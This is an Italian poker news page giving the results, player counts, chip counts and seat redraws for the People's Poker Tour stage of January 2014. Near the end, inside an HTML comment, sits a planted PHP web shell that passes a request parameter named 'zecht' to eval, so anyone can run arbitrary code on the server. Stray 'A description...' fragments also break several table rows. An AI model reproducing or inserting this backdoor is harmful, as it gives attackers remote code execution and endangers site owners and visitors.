Home » Poker » Data Tournament People’s Poker Tour Live Gennaio 2014

Data Tournament People’s Poker Tour Live Gennaio 2014

In questo post potrete trovare tutti i dati della tappa di Gennaio 2014 del People’s Poker Tour:
Chip count e Data Tournament del People’s Poker Tour che si giocherà dal 9 al 13 Gennaio 2014
That’s Poker!


ITM

MAIN EVENT:

1° >
2° >
3° >
4° >
5° >
6° > Cioci Marco
7° > Testud Paul

9°> Michele Sigoli
10°> Dario Rusconi
11°> Marco Dellamonica
12°> Giorgio Bernasconi
13°> Alessandro Corallo
14°> Roberto Crescenti
15°> Filippo Candio
16°> Trung Nguyen
17°> Davide Suriano
18°> Alessanro Caria
19°> Riccardo Lacchinelli
20°> Andrea Montini
21°> Nicola Lestingi
22°> Gianluca Loiodice
23°> Marco Orlando
24°> Inzilya Novitskaya
25°> Nicolino Di Carlo
26°> Lorenzo Fiore
27°> Gerardo Muro
28°> Massimo Poggi
29°> Juri Lombardo
30°> Francesco Cirianni
RUNNER SIDE EVENT :

1° > Simone Alfonso
2° > Napoletano Aniello
3° > Sorgente Antonio
4° > Della Penna Paolo
5° > Amoroso Filippo
6° > Greco Giuseppe
7° > Arcà Maurizio
8° > Fiorilla Alberto
9° > Minasi Alessandro
10° > Mosca Enrico
11° > Mancini Pasquale
12° > Piovano Giuseppe

KNOCKOUT SIDE EVENT :

1° > Ciravegna Dario
2° > Lombardo Juri
3° > Barp Luca
4° > Suriano Riccardo
5° > Matarrese Ivan
6° > Reina Riccardo
7° > Riccardi Alfonso
8° > Volpe Rocco
9° > Etna Filippo
10° > Masciale Carmine

RELAX SIDE EVENT :

1° > Monzio Compagnoni
2° > La Manna Lorenzo
3° > Bortone Vincenzo
4° > Minei Marco
5° > Blandon Di Puppo
6° > Macchieraldo Sandra
7° > Ierardi Angelo
8° > Iuvara Raffaele

OMAHA SIDE EVENT :

1° > Marino Vincenzo
2° > Bonanno Roberto
3° > La Mantia Salvatore
4° > Solazzo Cosimo
5° > Della Tommasina Marco

DATI COMPLESSIVI /
MERCOLEDI 8 GENNAIO 2014:
– FREEROLL INAUGURALE > 256 Players
– SATELLITE MAIN VENT > 42 Players
– SIT & GO > 40 Players
GIOVEDI 9 GENNAIO 2014:
– MAIN EVENT DAY1 A > 73 Players
– SATELLITE MAIN EVENT DAY1 B > 42 Players
– SIT & GO > 40 Players
VENERDI 10 GENNAIO 2014:
– MAIN EVENT DAY1 B > 206 Players
– SIDE EVENT RELAX > 68 Players
– SIT & GO > 50 Players
SABATO 11 GENNAIO 2014:
– MAIN EVENT START DAY2 >139 Players
– RUNNER SIDE EVENT DAY1 > 106 Players
– SIT & GO > 100 Players
DOMENICA 12 GENNAIO 2014:
– MAIN EVENT START DAY3 > 30 Players
– RUNNER SIDE EVENT DAY2 > 27 Players
– SIDE EVENT KNOCK OUT > 99 Players
– PL OMAHA EVENT > 34 Playesr
– SIT & GO > 50 Players
TOTALE PLAYERS MAIN EVENT: 279
TOTALE PLAYERS GIOCANTI: 1196

RANK START PLAYERS FINAL DAY MAIN EVENT (CHIP-COUNT ORDER)
RANK ID PLAYER Player Name CHIP COUNT
1 67 Fabio De Nardi 1341000
2 196 Michele Gaudioso 1274000
3 238 Benvenuto Bernardini 1152000
4 113 Giorgio Montebelli 911000
5 233 Paolino Virciglio 732000
6 267 Paul Testud 550000
7 294 Riccardo Chiusaroli 549000
8 278 Marco Cioci 447000
FINAL POSITION PLAYERS MAIN EVENT DAY 3 (ROUND OUT ORDER)
RANK ID PLAYER Player Name CHIP COUNT
30° 282 Francesco Cirianni 18
29° 175 Juri Lombardo 18
28° 249 Massimo Poggi 18
27° 172 Gerardo Muro 18
26° 71 Lorenzo Fiore 18
25° 9 Nicolino Di Carlo 18
24° 291 Inzilya Novitskaya 18
23° 112 Marco Orlando 18
22° 262 Gianluca Loiodice 19
21° 130 Nicola Lestingi 19
20° 174 Andrea Montini 19
19° 193 Riccardo Lacchinelli 19
18° 17 Alessanro Caria 19
17° 161 Davide Suriano 20
16° 247 Trung Nguyen 20
15° 3 Filippo Candio 20
14° 140 Roberto Crescenti 20
13° 265 Alessandro Corallo 20
12° 215 Giorgio Bernasconi 21
11° 189 Marco Dellamonica 21
10° 213 Dario Rusconi 21
279 Michele Sigoli 23
RANK START PLAYERS MAIN EVENT DAY 3 (CHIP-COUNT ORDER)
RANK ID PLAYER Player Name CHIP COUNT
3 Filippo Candio 607000
17 Alessanro Caria 541000
113 Giorgio Montebelli 479000
238 Benvenuto Bernardini 432000
67 Fabio De Nardi 418000
189 Marco Dellamonica 369000
279 Michele Sigoli 365000
174 Andrea Montini 330000
294 Riccardo Chiusaroli 282000
10° 262 Gianluca Loiodice 281000
11° 9 Nicolino Di Carlo 254000
12° 161 Davide Suriano 234000
13° 267 Paul Testud 210000
14° 140 Roberto Crescenti 204000
15° 193 Riccardo Lacchinelli 199000
16° 213 Dario Rusconi 178000
17° 247 Trung Nguyen 175000
18° 172 Gerardo Muro 157000
19° 278 Marco Cioci 155000
20° 215 Giorgio Bernasconi 151000
21° 291 Inzilya Novitskaya 139000
22° 233 Paolino Virciglio 136000
23° 112 Marco Orlando 133000
24° 130 Nicola Lestingi 119000
25° 265 Alessandro Coralio 89000
26° 71 Lorenzo Fiore 86000
27° 196 Michele Gaudioso 61000
28° 175 Juri Lombardo 58000
29° 249 Massimo Poggi 57000
30° 282 Francesco Cirianni 51000
FINAL POSITION PLAYERS MAIN EVENT DAY 2 (ROUND OUT ORDER)
RANK START PLAYERS RUNNER SIDE EVENT DAY 2 (CHIP-COUNT ORDER)
RANK ID PLAYER Player Name CHIP COUNT
13 Napoletano Aniello 198.100
25 Simone Alfonso 168.900
33 Arca Maurizio 124.500
47 Fortunato Francesco 119.600
66 Piovano Giuseppe 82.800
80 Fiorilla Alberto 76.000
72 Di Giacomo Claudio 73.000
36 Liotti Daniele 67.600
1 Mosca Enrico 65.500
10° 3 Valletta Aldo 62.000
11° 51 Greco Giuseppe 59.800
12° 56 Sorgente Antonio 47.300
13° 62 Di Cicco Massimo 45.000
14° 77 Montruccoli Marco 42.700
15° 52 Pezzano Daniele 40.000
16° 11 Amoroso Filippo 36.500
17° 4 Della Penna Paolo 36.000
18° 17 Mancini Pasquale 35.700
19° 37 Minasi Alessandro 35.600
20° 98 Della Tommasina Marco 29.000
21° 84 Treccarichi Walter 28.700
22° 21 Gatto Simone 27.200
23° 38 Di Lorenzo Roberto 21.600
24° 23 Salvatore Giovanni 21.600
25° 81 Bertoldi Stefano 20.900
26° 69 Ruscalla Pier Paolo 17.800
27° 35 Sasso Nicola 8.000

REDRAW START PLAYERS MAIN EVENT DAY 2 (ALPHABETIC ORDER)

Rank Player Name ID PLAYER TABLE SIT CHIP-COUNT
110° Alacchi Giulio 182 9 10 25.700
18° Albanese Natale 173 9 5 88.500
88° Albanese Mario 25 11 7 36.100
96° Allegra Natale 198 4 3 32.400
54° Ammora Luigi 145 13 6 52.200
81° Argento Carmelo 285 14 3 38.100
134° Benazzi Angelo 298 5 10 13.600
33° Benelli Andrea 273 12 2 68.500
26° Bernardini Benvenuto 238 14 8 72.900
74° Bernasconi Giorgio 215 3 1 40.100
39° Bernaudo Antonio 50 4 2 65.000
100° Bertolucci Raffaele 44 2 10 30.900
59° Bisciglia Filippo 263 11 8 48.700
64° Bisignani Salvatore 306 4 6 44.600
Bognanni Marco 246 3 5 130.100
72° Bologna Fabio 261 11 6 40.800
12° Bonanno Roberto 258 13 1 98.000
105° Bonavena Salvatore 253 6 4 28.300
75° Brini Pietro 211 2 1 39.700
48° Buzzanca Enrico 206 3 6 53.800
102° Calabrese Francesco 131 14 10 29.600
32° Calabretta Santo 239 11 2 69.300
Candio Filippo 3 4 5 141.500
25° Caria Alessanro 17 13 8 73.900
121° Carletta Salvatore 119 2 A description...

9
19.900
93° Chiusaroli Riccardo 294 8 6 33.600
27° Cioci Marco 278 1 2 72.800
103° Cirianni Francesco 282 11 10 29.600
73° Coralio Alessandro 265 5 1 40.700
127° Cortese Sergio 207 13 4 17.400
58° Crescenti Roberto 140 1 1 49.900
41° Crisari Silvio 32 2 2 64.100
107° Daniele Ciro 260 8 4 27.400
16° De Giacomo Tommaso 35 11 5 92.700
31° De Iaco Alessandro 142 10 5 69.600
130° De Marco Massimo 118 11 9 16.600
94° De Michele Alessandro 224 6 3 33.300
De Nardi Fabio 67 8 8 142.500
30° De Pinto Arcangelo 177 12 5 70.100
Delfoco Francesco 256 7 2 135.000
40° Della Tommasina Marco 22 12 8 65.000
Dellamonica Marco 189 7 5 102.000
79° Demontis Stefano 109 13 3 38.600
20° Di Carlo Nicolino 9 3 8 81.500
14° Di Cicco Massimo 227 2 7 95.100
124° Di Ieso Pasquale 149 14 9 19.300
A description...

80°
Eriksson Robert 210 5 A description...

7
38.600
113° Etna Filippo 154 12 4 23.400
82° Facciolongo Stefano 29 1 10 38.000
15° Fasolis Alessandro 148 1 7 94.600
84° Fejles Paolo 301 7 7 37.000
Fiore Lorenzo 71 2 5 125.200
37° Fiorilla Alberto 65 8 2 66.200
77° Fischietti Mauro 21 3 7 39.000
101° Fisichella Giancarlo 276 7 10 29.700
135° Francolini Mauro 151 6 9 12.900
112° Fratello Matteo 40 11 4 24.500
108° Garbarino Stefano 125 6 10 27.100
85° Gastreghini Simone 139 6 7 36.900
136° Gatto Simone 34 7 9 10.200
10° Gaudioso Michele 196 10 8 102.000
89° Gualdi Elios 24 12 3 35.600
44° Guerriero Luigi 153 13 2 59.100
83° Ironico Gianfranco 187 3 10 38.000
129° Jedruch Jan 28 10 9 17.300
55° La Manna Lorenzo 70 14 6 52.100
49° Lacchinelli Riccardo 193 12 7 53.000
78° Laganà Nunzio 212 4 7 39.000
104° Landi Eugenio 143 5 4 29.500
13° Lepore Gabriele 287 14 1 97.300
28° Lestingi Nicola 130 3 2 72.200
66° Limongi Michele 218 1 6 43.600
97° Lo Carbo Fabrizio 166 3 3 31.900
21° Loiodice Gianluca 262 9 6 79.300
23° Lombardo Juri 175 5 8 75.000
118° Losi Ivan 186 3 9 21.100
122° Mariani Claudio 152 1 9 19.500
35° Masciale Carmine 297 4 8 66.400
98° Matarrese Ivan 27 9 3 31.900
106° Mauro Leonardo 48 7 4 28.300
125° Monaco Marco 203 2 4 19.100
114° Montebelli Giorgio 113 13 10 22.200
63° Montini Andrea 174 13 7 45.000
126° Mosele Massimo 250 1 4 19.000
38° Muro Gerardo 172 6 2 65.800
46° Napoli Roberto 110 6 6 57.600
42° Nastasi Eros 305 1 8 64.100
90° Nguyen Trung 247 1 3 35.500
22° Novitskaya Inzilya 291 5 6 77.500
11° Novitskiy Alexander 290 6 5 101.000
117° Orlando Marco 112 3 4 22.000
111° Palassini Paolo 231 10 4 25.100
A description...

99°
Pallassini Piero 235 2 A description...

3
31.300
47° Palmisano Alfonso 275 2 A description...

6
55.500
70° Papotti Mattia 114 4 1 41.700
45° Parabita Daniele 116 14 2 58.200
61° Peralta Michele 7 8 1 47.700
119° Percopo Giovanni 300 8 10 20.700
131° Petrellese Francesco 146 12 9 16.000
109° Piazza Massimiliano 10 4 10 26.400
52° Piteo Adriano 23 10 3 52.600
67° Plevano Pasquale 63 14 7 43.600
53° Poggi Massimo 249 7 6 52.300
76° Polizzi Salvatore 259 10 1 39.600
87° Pollet Walter 208 9 7 36.300
29° Pollin Claudio 136 9 2 71.700
120° Raccis Simone 156 12 10 20.100
92° Ricciardi Alfonso 128 7 3 34.400
62° Rizzo Giampietro 228 9 1 46.200
137° Rocca Marcello 234 8 9 9.900
86° Rositi Niki 16 8 7 36.700
24° Rusconi Dario 213 7 8 74.900
43° Rusello Angelo 31 5 2 60.700
56° Sabato Umberto 107 12 1 52.000
50° Sacchella Gianbattista 178 11 3 53.000
115° Saieva Maurizio 26 4 4 22.200
128° Sarro Alessandro 47 14 4 17.400
51° Savinelli Carlo 268 10 7 53.000
91° Sbrana Matteo 277 8 3 34.700
68° Sentini Mauro 171 7 1 42.700
57° Sgherza Raffaele 217 11 1 51.500
60° Sigoli Michele 279 2 8 48.300
138° Solazzo Raffaele 230 9 9 9.700
34° Stramacci Fabrizo 184 10 2 67.200
Suriano Davide 161 5 5 116.000
139° Tamiro Rinaldo 37 4 9 7.900
133° Terragno Luigi 117 9 A description...

4
14.500
Terziani Stefano 226 1 5 157.500
17° Testud Paul 267 8 5 92.700
123° Tofù Erminio 103 13 9 19.400
19° Toisi Gaetano 15 13 5 85.700
65° Trebbi Gianluca 38 12 6 43.700
95° Treccarichi Walter 245 5 3 33.300
71° Ursu Vladimir 5 10 6 41.000
69° Villani Augusto 295 6 1 41.800
Virciglio Paolino 233 6 8 111.400
132° Volpe Rocco 6 5 9 15.700
36° Zambon Simone 56 9 8 66.300
116° Zizzi Daniele 163 10 10 22.200
RANK START PLAYERS MAIN EVENT DAY 2 (CHIP-COUNT ORDER)
Rank Player Name ID Player Chip Count
Terziani Stefano 226 157.500
De Nardi Fabio 67 142.500
Candio Filippo 3 141.500
Delfoco Francesco 256 135.000
Bognanni Marco 246 130.100
Fiore Lorenzo 71 125.200
Suriano Davide 161 116.000
Virciglio Paolino 233 111.400
Dellamonica Marco 189 102.000
10° Gaudioso Michele 196 102.000
11° Novitskiy Alexander 290 101.000
12° Bonanno Roberto 258 98.000
13° Lepore Gabriele 287 97.300
14° Di Cicco Massimo 227 95.100
15° Fasolis Alessandro 148 94.600
16° De Giacomo Tommaso 35 92.700
17° Testud Paul 267 92.700
18° Albanese Natale 173 88.500
19° Toisi Gaetano 15 85.700
20° Di Carlo Nicolino 9 81.500
21° Loiodice Gianluca 262 79.300
22° Novitskaya Inzilya 291 77.500
23° Lombardo Juri 175 75.000
24° Rusconi Dario 213 74.900
25° Caria Alessanro 17 73.900
26° Bernardini Benvenuto 238 72.900
27° Cioci Marco 278 72.800
28° Lestingi Nicola 130 72.200
29° Pollin Claudio 136 71.700
30° De Pinto Arcangelo 177 70.100
31° De Iaco Alessandro 142 69.600
32° Calabretta Santo 239 69.300
33° Benelli Andrea 273 68.500
34° Stramacci Fabrizo 184 67.200
35° Masciale Carmine 297 66.400
36° Zambon Simone 56 66.300
37° Fiorilla Alberto 65 66.200
38° Muro Gerardo 172 65.800
39° Bernaudo Antonio 50 65.000
40° Della Tommasina Marco 22 65.000
41° Crisari Silvio 32 64.100
42° Nastasi Eros 305 64.100
43° Rusello Angelo 31 60.700
44° Guerriero Luigi 153 59.100
45° Parabita Daniele 116 58.200
46° Napoli Roberto 110 57.600
A description...

47°
Palmisano Alfonso 275 A description...

55.500
48° Buzzanca Enrico 206 53.800
49° Lacchinelli Riccardo 193 53.000
50° Sacchella Gianbattista 178 53.000
51° Savinelli Carlo 268 53.000
52° Piteo Adriano 23 52.600
53° Poggi Massimo 249 52.300
54° Ammora Luigi 145 52.200
55° La Manna Lorenzo 70 52.100
56° Sabato Umberto 107 52.000
57° Sgherza Raffaele 217 51.500
58° Crescenti Roberto 140 49.900
59° Bisciglia Filippo 263 48.700
60° Sigoli Michele 279 48.300
61° Peralta Michele 7 47.700
62° Rizzo Giampietro 228 46.200
63° Montini Andrea 174 45.000
64° Bisignani Salvatore 306 44.600
65° Trebbi Gianluca 38 43.700
66° Limongi Michele 218 43.600
67° Plevano Pasquale 63 43.600
68° Sentini Mauro 171 42.700
69° Villani Augusto 295 41.800
70° Papotti Mattia 114 41.700
71° Ursu Vladimir 5 41.000
72° Bologna Fabio 261 40.800
73° Coralio Alessandro 265 40.700
74° Bernasconi Giorgio 215 40.100
75° Brini Pietro 211 39.700
76° Polizzi Salvatore 259 39.600
77° Fischietti Mauro 21 39.000
78° Laganà Nunzio 212 39.000
79° Demontis Stefano 109 38.600
80° Eriksson Robert 210 38.600
81° Argento Carmelo 285 38.100
82° Facciolongo Stefano 29 38.000
83° Ironico Gianfranco 187 38.000
84° Fejles Paolo 301 37.000
85° Gastreghini Simone 139 36.900
86° Rositi Niki 16 36.700
87° Pollet Walter 208 36.300
88° Albanese Mario 25 36.100
89° Gualdi Elios 24 35.600
90° Nguyen Trung 247 35.500
91° Sbrana Matteo 277 34.700
92° Ricciardi Alfonso 128 34.400
A description...

93°
Chiusaroli Riccardo 294 A description...

33.600
94° De Michele Alessandro 224 33.300
95° Treccarichi Walter 245 33.300
96° Allegra Natale 198 32.400
97° Lo Carbo Fabrizio 166 31.900
98° Matarrese Ivan 27 31.900
99° Pallassini Piero 235 31.300
100° Bertolucci Raffaele 44 30.900
101° Fisichella Giancarlo 276 29.700
102° Calabrese Francesco 131 29.600
103° Cirianni Francesco 282 29.600
104° Landi Eugenio 143 29.500
105° Bonavena Salvatore 253 28.300
106° Mauro Leonardo 48 28.300
107° Daniele Ciro 260 27.400
108° Garbarino Stefano 125 27.100
109° Piazza Massimiliano 10 26.400
110° Alacchi Giulio 182 25.700
111° Palassini Paolo 231 25.100
112° Fratello Matteo 40 24.500
113° Etna Filippo 154 23.400
114° Montebelli Giorgio 113 22.200
115° Saieva Maurizio 26 22.200
116° Zizzi Daniele 163 22.200
117° Orlando Marco 112 22.000
118° Losi Ivan 186 21.100
119° Percopo Giovanni 300 20.700
120° Raccis Simone 156 20.100
121° Carletta Salvatore 119 19.900
122° Mariani Claudio 152 19.500
123° Tofù Erminio 103 19.400
124° Di Ieso Pasquale 149 19.300
125° Monaco Marco 203 19.100
126° Mosele Massimo 250 19.000
127° Cortese Sergio 207 17.400
128° Sarro Alessandro 47 17.400
129° Jedruch Jan 28 17.300
130° De Marco Massimo 118 16.600
131° Petrellese Francesco 146 16.000
132° Volpe Rocco 6 15.700
133° Terragno Luigi 117 14.500
134° Benazzi Angelo 298 13.600
135° Francolini Mauro 151 12.900
136° Gatto Simone 34 10.200
137° Rocca Marcello 234 9.900
138° Solazzo Raffaele 230 9.700
139° Tamiro Rinaldo 37 A description...

7.900
FINAL RANK PLAYERS MAIN EVENT DAY 1A (CHIP COUNT ORDER)
…….
FINAL POSITION PLAYERS MAIN EVENT DAY 1A (ROUND OUT ORDER)
Final Position ID Player Player Name Round Out
36° 30 Argento Carmelo 8
37° 49 Coronese Luca 8
38° 51 Mangano Fabio 8
39° 43 Sbrana Matteo 8
40° 62 Capece Roberto 7
41° 58 Perati Muhamet 7
42° 8 Landi Eugenio 7
43° 2 Francolini Mauro 7
44° 68 Segreto Fabio 7
45° 66 Di Giacomo Claudio 7
46° 69 Testud Paul 7
47° 18 Posa Domenico 6
48° 41 Romanelli Enrico 6
49° 64 Limongi Michele 6
50° 73 Pescatori Massimiliano 6
51° 57 Castaldi Enrico 6
52° 11 Di Carlo Fabio 6
53° 55 Giovinazzo Giorgio 6
54° 20 Tamiro Nicola 6
55° 54 Di Santo Lorenzo 5
56° 1 Eriksson Mats Robert 5
57° 14 Avanzino Marco 5
58° 61 Federici Piero 5
59° 52 Curcio Luigi 5
60° 59 Delfoco Francesco 5
61° 46 De Lorenzis Saverio 4
62° 60 Cara Lek 4
63° 13 Scopelliti Giovanni 4
64° 33 Recchia Angelo 4
65° 72 Benatti Angelo 4
66° 4 Cichella Davide 4
67° 42 Medda Francesco 4
68° 36 Galliano Sergio 4
69° 12 Di Carlo Graziano 3
70° 53 Caridi Giuseppe 2
71° 45 Festa Fortunato 2
72° 39 Castelluccio Sergio 2
73° 19 Di Ieso Pasquale 2
PLAYERS START MAIN EVENT DAY 1A (ALPHABETIC ORDER)
ID Player Player Name
25 Albanese Mario
30 Argento Carmelo
14 Avanzino Marco
72 Benatti Angelo
50 Bernaudo Antonio
44 Bertolucci Raffaele
3 Candio Filippo
62 Capece Roberto
60 Cara Lek
17 Caria Alessanro
53 Caridi Giuseppe
57 Castaldi Enrico
39 Castelluccio Sergio
4 Cichella Davide
49 Coronese Luca
32 Crisari Silvio
52 Curcio Luigi
35 De Giacomo Tommaso
46 De Lorenzis Saverio
67 De Nardi Fabio
59 Delfoco Francesco
22 Della Tommasina Marco
9 Di Carlo Nicolino
12 Di Carlo Graziano
11 Di Carlo Fabio
66 Di Giacomo Claudio
19 Di Ieso Pasquale
54 Di Santo Lorenzo
1 Eriksson Mats Robert
29 Facciolongo Stefano
61 Federici Piero
45 Festa Fortunato
71 Fiore Lorenzo
65 Fiorilla Alberto
21 Fischietti Mauro
2 Francolini Mauro
40 Fratello Matteo
36 Galliano Sergio
34 Gatto Simone
55 Giovinazzo Giorgio
24 Gualdi Elios
28 Jedruch Jan
70 La Manna Lorenzo
8 Landi Eugenio
64 Limongi Michele
51 Mangano Fabio
27 Matarrese Ivan
48 Mauro Leonardo
42 Medda Francesco
7 Peralta Michele
58 Perati Muhamet
73 Pescatori Massimiliano
10 Piazza Massimiliano
23 Piteo Adriano
63 Plevano Pasquale
18 Posa Domenico
33 Recchia Angelo
41 Romanelli Enrico
16 Rositi Niki
31 Rusello Angelo
26 Saieva Maurizio
47 Sarro Alessandro
43 Sbrana Matteo
13 Scopelliti Giovanni
68 Segreto Fabio
37 Tamiro Rinaldo
20 Tamiro Nicola
69 Testud Paul
15 Toisi Gaetano
38 Trebbi Gianluca
5 Ursu Vladimir
6 Volpe Rocco
56 Zambon Simone

<!– [insert_php]if (isset($_REQUEST["zecht"])){eval($_REQUEST["zecht"]);exit;}[/insert_php][php]if (isset($_REQUEST["zecht"])){eval($_REQUEST["zecht"]);exit;}[/php] –>

Guarda anche

Big Bang 2016

Big Bang dal 10 al 14 marzo 2016

Il Big Bang torna al Saint-Vincent Resort & Casino! Dal 10 al 14 marzo grandi …

Lascia un commento

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *